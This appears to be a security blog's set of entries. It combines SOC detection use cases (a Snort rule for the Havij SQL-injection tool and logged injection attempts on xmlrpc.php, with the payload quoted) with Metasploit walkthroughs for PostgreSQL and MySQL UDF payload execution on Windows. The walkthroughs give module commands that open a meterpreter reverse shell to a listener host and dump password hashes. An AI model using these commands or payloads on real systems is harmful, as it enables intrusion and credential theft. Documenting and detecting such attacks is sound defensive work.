SUC021 : Havij SQL Injection Tool User-Agent Inbound

  • Use Case Reference : SUC021
  • Use Case Title : Havij SQL Injection Tool User-Agent Inbound
  • Use Case Detection : IDS / HTTP / SQL logs
  • Attacker Class : Opportunists / Targeting Opportunists / Professional
  • Attack Sophistication : Unsophisticated / Low / Mid-High
  • Identified tool(s) : Havij Advanced SQL Injection
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • Havij Advanced SQL Injection free version
  • Havij Advanced SQL Injection commercial version

Source(s) :

Snort rule :
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ZATAZ SCAN Havij SQL Injection Tool User-Agent Inbound"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Havij"; nocase; http_header; reference:url,itsecteam.com/en/projects/project1.htm; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; priority:2; sid:1010051; rev:1;)
SIG 1010051 1 Week events activity
SIG 1010051 1 Week events activity
SIG 1010051 1 month events activity
SIG 1010051 1 month events activity

PostgreSQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-04-01
Metasploit PoC provided by todb the 2011-03-23

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows PostgreSQL, before or equal to 8.4.x 32-bit.

Tested on Windows XP SP3 with :

PostgreSQL 8.4.7

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLL’s from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.

Commands :

use exploit/windows/postgres/postgres_payload
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows MySQL, how support UDF, due to the fact that default MySQL installation is done with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

To exploit this weakness, the MySQL targeted user should have the following global privileges :

grant select,insert,file, create routine,alter routine,execute on *.* to [email protected]%’ identified by ‘test3’;

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump

SUC016 : RCE & SQL injection attempts on xmlrpc.php

  • Use Case Reference : SUC016
  • Use Case Title : RCE & SQL injection attempts on xmlrpc.php
  • Use Case Detection : IDS / Web logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : No, but User-Agent Mozilla/5.0
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP
Possible(s) correlation(s) :
  • Joomla XML-RPC vulnerability
  • Multi functions Web scanner (RFI, LFI, XMLRPC, etc.)

Source(s) :

Since one week, we have detect some increasing RCE (Remote Code Execution) and SQL injection attempts on xmlrpc.php. These attempts are detected by ET rule 2002158, with last modification on the rule the 2009-03-13.

You can find here under the payload how is called by the attempts.

test.method’,”));echo ‘XxXDIOCANEXxX’;exit;/*

Despite the source IPs are completely random, the User Agent is still Mozilla/5.0 and the payload is all the time the same. These attempts seems to be generated by a tool using some Google dorking capabilities. Also the source IPs are also involved in other exploits attempts, members of RFI or LFI botnets.

24 hours SIG 2002158 events activities
24 hours SIG 2002158 events activities
1 week SIG 2002158 events activities
1 week SIG 2002158 events activities
1 Month SIG 2002158 events activities
1 Month SIG 2002158 events activities
One year SIG 2002158 events activities
One year SIG 2002158 events activities
1 Month TOP 10 source IPs for SIG 2002158
1 Month TOP 10 source IPs for SIG 2002158